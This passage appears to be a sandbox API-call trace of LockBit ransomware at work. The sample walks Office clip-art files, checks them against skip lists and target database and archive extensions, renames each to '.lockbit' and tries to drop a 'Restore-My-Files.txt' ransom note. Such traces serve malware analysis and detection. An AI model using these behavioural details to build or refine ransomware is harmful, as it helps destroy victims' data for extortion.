Office\\CLIPART\\PUB60COR\\") returned="" [0138.166] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned=".WMF" [0138.166] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.166] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.166] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.166] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.166] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.166] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.166] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.166] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.166] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.166] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.167] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.167] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.167] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.167] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.167] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.167] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.167] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.167] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.167] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.168] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.168] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.170] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.170] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.170] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.170] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.170] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.170] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.170] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.170] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF.lockbit") returned 72 [0138.170] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101980.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0138.174] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.174] malloc (_Size=0x40068) returned 0x3df0008 [0138.174] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16104) returned 1 [0138.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.177] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.177] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.177] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.179] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.182] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.182] malloc (_Size=0xa6) returned 0x77d7a8 [0138.182] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.183] free (_Block=0x77d7a8) [0138.184] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.184] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.184] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.184] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0102002.WMF", cAlternateFileName="")) returned 1 [0138.184] lstrcmpiW (lpString1=".", lpString2="J0102002.WMF") returned -1 [0138.184] lstrcmpiW (lpString1="..", lpString2="J0102002.WMF") returned -1 [0138.184] PathFindExtensionW (pszPath="J0102002.WMF") returned=".WMF" [0138.184] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.184] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.185] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.185] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0102002.WMF") returned 1 [0138.185] lstrcmpiW (lpString1="ntldr", lpString2="J0102002.WMF") returned 1 [0138.186] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0102002.WMF") returned 1 [0138.186] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0102002.WMF") returned -1 [0138.186] lstrcmpiW (lpString1="autorun.inf", lpString2="J0102002.WMF") returned -1 [0138.186] lstrcmpiW (lpString1="thumbs.db", lpString2="J0102002.WMF") returned 1 [0138.186] lstrcmpiW (lpString1="iconcache.db", lpString2="J0102002.WMF") returned -1 [0138.186] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.186] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned=".WMF" [0138.186] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.186] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.186] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.187] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF.lockbit") returned 72 [0138.187] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102002.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0138.187] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.187] malloc (_Size=0x40068) returned 0x3df0008 [0138.187] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=15988) returned 1 [0138.187] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.188] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.188] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.188] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.309] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.309] malloc (_Size=0xa6) returned 0x77d7a8 [0138.309] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.310] free (_Block=0x77d7a8) [0138.310] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.310] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.310] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.310] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6978, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0102594.WMF", cAlternateFileName="")) returned 1 [0138.310] lstrcmpiW (lpString1=".", lpString2="J0102594.WMF") returned -1 [0138.310] lstrcmpiW (lpString1="..", lpString2="J0102594.WMF") returned -1 [0138.310] PathFindExtensionW (pszPath="J0102594.WMF") returned=".WMF" [0138.310] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.310] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.310] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.310] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.310] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.310] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.310] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.310] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.310] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.310] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.310] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.310] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.310] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.311] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.311] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0102594.WMF") returned 1 [0138.312] lstrcmpiW (lpString1="ntldr", lpString2="J0102594.WMF") returned 1 [0138.312] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0102594.WMF") returned 1 [0138.312] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0102594.WMF") returned -1 [0138.312] lstrcmpiW (lpString1="autorun.inf", lpString2="J0102594.WMF") returned -1 [0138.312] lstrcmpiW (lpString1="thumbs.db", lpString2="J0102594.WMF") returned 1 [0138.312] lstrcmpiW (lpString1="iconcache.db", lpString2="J0102594.WMF") returned -1 [0138.312] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.312] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned=".WMF" [0138.312] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.312] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.312] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.313] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.313] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.313] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.313] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.313] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF.lockbit") returned 72 [0138.313] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102594.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0138.313] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.313] malloc (_Size=0x40068) returned 0x3df0008 [0138.313] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=27000) returned 1 [0138.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.314] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.317] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.317] malloc (_Size=0xa6) returned 0x77d7a8 [0138.317] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.318] free (_Block=0x77d7a8) [0138.318] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.318] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.318] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.318] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2bd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0102762.WMF", cAlternateFileName="")) returned 1 [0138.318] lstrcmpiW (lpString1=".", lpString2="J0102762.WMF") returned -1 [0138.318] lstrcmpiW (lpString1="..", lpString2="J0102762.WMF") returned -1 [0138.318] PathFindExtensionW (pszPath="J0102762.WMF") returned=".WMF" [0138.318] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.318] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.318] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.318] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.318] lstrcmpiW 